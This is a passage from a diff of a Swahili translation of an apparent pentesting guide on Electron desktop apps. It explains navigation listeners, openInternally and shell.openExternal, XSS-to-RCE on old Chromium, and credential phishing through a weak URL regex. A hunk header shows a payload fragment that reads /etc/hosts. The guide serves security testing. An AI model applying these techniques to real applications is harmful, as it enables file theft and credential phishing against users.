kwamba **utekelezaji wa kanuni za mbali (RCE)** upande wa mteja unalenga skripti za kuanzisha au kanuni ya asili ya Electron kutoka kwa mchakato mkuu inazuia kwa ufanisi na mipangilio hii ikiwa mahali. +Wakati wa kutekeleza programu ya desktop ya Electron, kuhakikisha mipangilio sahihi kwa `nodeIntegration` na `contextIsolation` ni muhimu. Imethibitishwa kwamba **utekelezaji wa kanuni za mbali (RCE)** upande wa mteja unalenga skripti za kuanzisha au kanuni ya asili ya Electron kutoka kwa mchakato kuu inazuia kwa ufanisi na mipangilio hii ikiwekwa. Mara tu mtumiaji anaposhirikiana na viungo au kufungua madirisha mapya, wasikilizaji maalum wa matukio hutekelezwa, ambayo ni muhimu kwa usalama na utendaji wa programu: ```javascript webContents.on("new-window", function (event, url, disposition, options) {} webContents.on("will-navigate", function (event, url) {} ``` -Watu hawa **hufunikwa na maombi ya desktop** ili kutekeleza **mantiki yake ya biashara**. Programu hii huchambua ikiwa kiungo kilichopita kinapaswa kufunguliwa ndani au kwenye kivinjari cha wavuti cha nje. Uamuzi huu kawaida hufanywa kupitia kazi, `openInternally`. Ikiwa kazi hii inarudi `uwongo`, inaonyesha kwamba kiungo hicho kinapaswa kufunguliwa kwa nje, kwa kutumia kazi ya `shell.openExternal`. +Hizi wasikilizaji **zinafutwa na programu ya desktop** ili kutekeleza **mantiki yake ya biashara**. Programu huchambua ikiwa kiungo kilichonavigated kinapaswa kufunguliwa ndani au kwenye kivinjari cha wavuti cha nje. Uamuzi huu kawaida hufanywa kupitia kazi, `openInternally`. Ikiwa kazi hii inarudi `false`, inaashiria kwamba kiungo kinapaswa kufunguliwa kwa nje, kwa kutumia kazi ya `shell.openExternal`. **Hapa kuna pseudocode iliyosimpliwa:** @@ -244,18 +258,18 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body Ikiwa **chromium** inayotumiwa na programu ni **zamani** na kuna **mapungufu yaliyojulikana** kwenye hiyo, inaweza kuwa inawezekana **kuitumia na kupata RCE kupitia XSS**.\ Unaweza kuona mfano katika **makala hii**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/) -## **XSS ya Uvutaji kwa Kupitia Bypass ya Regex ya URL ya Ndani** +## **XSS ya Uvutaji wa Kitambulisho kupitia Uvukaji wa Regex wa URL ya Ndani** -Kukisia umepata XSS lakini **hauwezi kuzindua RCE au kuiba faili za ndani** unaweza jaribu kutumia hiyo **kuiba siri kupitia uvutaji**. +Kukisia umepata XSS lakini huwezi **kuchochea RCE au kuiba faili za ndani** unaweza kujaribu kutumia hiyo **kuiba vibali kupitia uvutaji**. -Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, kwa kuangalia msimbo wa JS katika sehemu ya mbele: +Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, ukichunguza msimbo wa JS katika sehemu ya mbele: ```javascript webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below) webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below) ``` -Mwito wa **`openInternally`** utaamua ikiwa **kiungo** kitafunguliwa kwenye **dirisha la desktop** kama ni kiungo kinachomilikiwa na jukwaa, **au** kitafunguliwa kwenye **kivinjari kama rasilimali ya tatu**. +Mwito wa **`openInternally`** utaamua ikiwa **kiungo** kitafunguliwa kwenye **dirisha la desktop** kama ni kiungo kinachomilikiwa na jukwaa, **au** ikiwa kitafunguliwa kwenye **kivinjari kama rasilimali ya tatu**. -Katika kesi **regex** inayotumiwa na kazi hiyo inaweza kuwa **dhaifu kwa kuzidiwa** (kwa mfano kwa **kutotoroka** vipande vya subdomains) mkaidi anaweza kutumia XSS kufungua **dirisha jipya ambalo** litakuwa kwenye miundombinu ya mkaidi **kutaka vibali** kutoka kwa mtumiaji: +Katika kesi **regex** inayotumiwa na kazi hiyo inaweza kuwa **dhaifu kwa kuzidiwa** (kwa mfano kwa **kutotoroka** vipande vya subdomains) mkaidi anaweza kutumia XSS kufungua **dirisha jipya ambalo** litakuwa kwenye miundombinu ya mkaidi **na kuomba vibali** kwa mtumiaji: ```html